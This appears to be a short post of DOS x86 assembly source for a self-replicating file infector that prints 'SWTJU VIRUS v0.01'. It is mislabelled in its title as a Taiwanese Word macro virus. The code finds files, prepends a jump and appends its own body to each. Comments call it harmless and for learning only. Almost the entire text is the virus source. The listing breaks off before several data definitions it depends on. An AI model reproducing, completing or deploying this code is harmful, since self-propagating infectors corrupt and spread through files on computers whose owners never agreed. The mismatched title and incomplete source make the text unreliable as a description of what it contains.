naoga

台湾NO.1 WORD宏病毒

；本病毒并无实质的破坏作用，仅供
；同仁理解Virus原理
；
；病毒源程序
code segment
ASSUME CS:CODE ,DS:CODE
VIRUS:MOV AX,CS
MOV DS,AX
MOV ES,AX
DB 0BBH
GROW DW 0H
LEA SI,BUFFER0[BX]
MOV DI,100H
MOV CX,3
REP MOVSB
MOV AH,1AH
LEA DX,DIR_BUFF[BX]
INT 21H
MOV AH,4EH
MOV CX,20H
LEA DX,SCH_STR[BX]
INT 21H
JC FAIL0
LEA DI,DIR_BUFF[BX]
MOV CX,8
INC DI
MOV AL,3FH
REP STOSB
MOV AH,4FH
INT 21H
FAIL0:JC FAIL1
LEA DI,SCH_STR[BX]
LEA SI,FILE_NAME[BX]
CLD
MOV CX,13
REP MOVSB
MOV AH,3DH
MOV AL,2
LEA DX,FILE_NAME[BX]
INT 21H
FAIL1:JNC FAIL3
JMP FAIL2
FAIL3:MOV FHANDLE[BX],AX
MOV AH,42H
MOV AL,0
PUSH BX
MOV BX,FHANDLE[BX]
MOV CX,0
MOV DX,0
INT 21H
POP BX
MOV AH,3FH
PUSH BX
LEA DX,BUFFER0[BX]
MOV BX,FHANDLE[BX]
MOV CX,3
INT 21H
POP BX
MOV AH,42H
MOV AL,2
PUSH BX
MOV BX,FHANDLE[BX]
MOV CX,0
MOV DX,0
INT 21H
POP BX
SUB AX,3
MOV BUFFER2[BX],AX
ADD AX,103H
MOV GROW[BX],AX
MOV DX,FILE_LENGTH[BX]
ADD AX,DX
JC FAIL2
MOV AH,BUFFER0[BX]
CMP AH,0E9H
JNZ WRITE
MOV AX,BUFFER2[BX]
SUB AX,BUFFER3[BX]
CMP AX,FILE_LENGTH[BX]
JZ CLOSE
WRITE:MOV AH,40H
MOV DX,BX
PUSH BX
MOV DX,BX
MOV CX,FILE_LENGTH[BX]
MOV BX,FHANDLE[BX]
INT 21H
POP BX
MOV AH,42H
MOV AL,0
PUSH BX
MOV BX,FHANDLE[BX]
MOV CX,0
MOV DX,0
INT 21H
POP BX
MOV AH,40H
LEA DX,BUFFER1[BX]
PUSH BX
MOV BX,FHANDLE[BX]
MOV CX,3
INT 21H
POP BX
CLOSE: MOV AH,3EH
PUSH BX
MOV BX,FHANDLE[BX]
INT 21H
POP BX
MOV AH,2CH
INT 21H
AND AH,02H
;JZ FAIL2
CALL SHOW
PUSH CS
MOV AX,100H
PUSH AX
XOR AX,AX
RETF
;JMP SHORT 100
FAIL2: LEA AX,BACK[BX]
SUB AX,0FEH
NOT AX
INC AX
MOV BACK[BX],AX
MOV AH,4CH
INT 21H
DB 0E9H
BACK DW 0FFEBH
SHOW:MOV AX,2
INT 10H
MOV AH,9
LEA DX,STRING[BX]
INT 21H
RET
STRING DB 0AH,0AH,0AH,0DH
DB 'SWTJU VIRUS v0.01 '